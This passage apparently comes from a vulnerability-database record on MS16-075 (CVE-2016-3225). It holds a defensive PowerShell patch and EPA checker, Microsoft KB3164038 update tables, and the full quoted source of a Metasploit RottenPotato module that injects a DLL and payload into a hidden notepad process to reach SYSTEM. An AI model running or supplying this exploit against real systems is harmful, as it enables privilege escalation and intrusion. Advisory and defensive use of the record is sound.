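    # carries a branch suffix such as "(win7sp1_ldr.160428-1453)" that breaks [version].
    $ver = New-Object System.Version($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)

    # Pick the branch with the highest Min that is still <= the installed version.
    $branch = $branches |
        Where-Object { [version]$_.Min -le $ver } |
        Sort-Object { [version]$_.Min } -Descending |
        Select-Object -First 1

    if (-not $branch) {
        return [pscustomobject]@{ File = $sys; Version = $ver; Branch = 'n/a'; Status = 'OS build not covered by MS16-075' }
    }
    # Assumption: Windows 10 builds after 1511 (10.0.14393 and later) shipped with the fix;
    # they land above the 1511 threshold and therefore report as patched.
    $status = if ($ver -lt [version]$branch.Fixed) { "VULNERABLE (fixed build is $($branch.Fixed))" } else { 'patched' }
    [pscustomobject]@{ File = $sys; Version = $ver; Branch = $branch.Os; Status = $status }
}

function Get-SmbServerEpa {
    # Assumption (not stated on this page): the SMB-server EPA switch from KB2345886 is the
    # "Microsoft network server: Server SPN target name validation level" policy, stored as
    # SmbServerNameHardeningLevel under LanmanServer\Parameters:
    #   0 = off (the default the advisory describes), 1 = accept if the client sent an SPN, 2 = required.
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $prop = Get-ItemProperty -Path $key -Name SmbServerNameHardeningLevel -ErrorAction SilentlyContinue
    $lvl  = if ($null -eq $prop) { 0 } else { [int]$prop.SmbServerNameHardeningLevel }
    $epa  = switch ($lvl) { 0 { 'off' } 1 { 'accept if provided' } 2 { 'required' } default { "unknown ($lvl)" } }
    [pscustomobject]@{ Key = $key; Level = $lvl; Epa = $epa }
}

Test-Ms16075Srvnet | Format-List
Get-SmbServerEpa   | Format-List

# To turn EPA on (2 = required). The advisory warns this can break applications, so test first,
# and it is a mitigation for the reflection, not a replacement for KB3161561/KB3163017/KB3163018:
#   Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
#       -Name SmbServerNameHardeningLevel -Value 2 -Type DWord
```

Reading the driver version and the HKLM value needs no elevation; changing the hardening level does, and the KB notes a restart is required after the update itself is applied. The branch table deliberately keys on the version floor rather than on the product name, which is how the plugin separates the Vista GDR and LDR servicing branches that share the same 6.0.6002 build number.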
</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. 
The articles may contain known issue information.<br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-6\" target=\"_self\">3161561</a> MS16-075 and MS16-076: Description of the security update for Windows SMB Server: June 14, 2016 </li><li><a href=\"https://support.microsoft.com/help/3163017\" id=\"kb-link-7\" target=\"_self\">3163017</a> Cumulative update for Windows 10: June 14, 2016</li><li><a href=\"https://support.microsoft.com/help/3163018 \" id=\"kb-link-8\" target=\"_self\">3163018</a>Cumulative update for Windows 10 Version 1511 and Windows Server 2016 Technical Preview 4: June 14, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-10\" target=\"_self\">Get security updates automatically</a>.<br/><br/><span class=\"text-base\">Note</span> For Windows RT 8.1, this update is available through Windows Update only.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 2: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-075\" id=\"kb-link-11\" target=\"_self\">Microsoft Security Bulletin MS16-075</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\"> Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based 
editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 7 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td 
class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the /Uninstall setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 R2 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table 
contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3161561-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key 
verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 8.1<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2012 and Windows Server 2012 R2 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span 
class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows RT 8.1 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">These updates are available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-24\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the 
list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr></table></div><h4 class=\"sbody-h4\"> Windows 10 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3163017-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3163017-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3163018-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3163018-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3163017\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 3163017</a><br/>See <a href=\"https://support.microsoft.com/help/3163018\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3163018</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-29\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" 
id=\"kb-link-30\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-31\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-32\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-06-14T19:04:10", "id": "KB3164038", "href": "https://support.microsoft.com/en-us/help/3164038/", "published": "2016-06-14T00:00:00", "title": "MS16-075: Security Update for Windows SMB Server: June 14, 2016", "type": "mskb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-10-06T20:46:48", "description": "This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. 
Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.", "edition": 1, "published": "2018-10-06T00:00:00", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3225"], "modified": "2018-10-06T00:00:00", "id": "1337DAY-ID-31263", "href": "https://0day.today/exploit/description/31263", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\r\n 'Description' => %q(\r\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\r\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\r\n does not spawn as SYSTEM, however once achieving a shell, one can easily\r\n use incognito to impersonate the token.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'FoxGloveSec', # the original Potato exploit\r\n 'breenmachine', # Rotten Potato NG!\r\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\r\n ],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => ['meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'none',\r\n 'WfsDelay' => '20'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows x86', { 'Arch' => ARCH_X86 }],\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'References' =>\r\n [\r\n ['MSB', 'MS16-075'],\r\n ['CVE', '2016-3225'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\r\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\r\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\r\n ],\r\n 'DisclosureDate' => 'Jan 16 2016',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def assign_target\r\n if target.name == 'Automatic'\r\n case sysinfo[\"Architecture\"]\r\n when 'x86'\r\n vprint_status(\"Found we are on an x86 target\")\r\n my_target = targets[1]\r\n when 'x64'\r\n vprint_status(\"Found we are on an x64 target\")\r\n my_target = targets[2]\r\n else\r\n fail_with(Failure::NoTarget, \"Unable to determine target\")\r\n end\r\n else\r\n my_target = target\r\n end\r\n return my_target\r\n end\r\n\r\n def verify_arch(my_target)\r\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\r\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\r\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\r\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\r\n 
end\r\n if client.arch != sysinfo[\"Architecture\"]\r\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\r\n else\r\n vprint_good(\"Current payload and target Arch match....\")\r\n end\r\n end\r\n\r\n def check\r\n privs = client.sys.config.getprivs\r\n if privs.include?('SeImpersonatePrivilege')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n my_target = assign_target\r\n print_status(\"#{my_target['Arch']}\")\r\n verify_arch(my_target)\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\r\n end\r\n if my_target.opts['Arch'] == 'x64'\r\n dll_file_name = 'rottenpotato.x64.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\r\n elsif my_target.opts['Arch'] == 'x86'\r\n dll_file_name = 'rottenpotato.x86.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\r\n else\r\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\r\n end\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n print_error('Operation failed. 
Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\nend\n\n# 0day.today [2018-10-06] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31263"}], "exploitdb": [{"lastseen": "2018-10-08T18:29:48", "description": "Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit). CVE-2016-3225. Local exploit for Windows platform. 
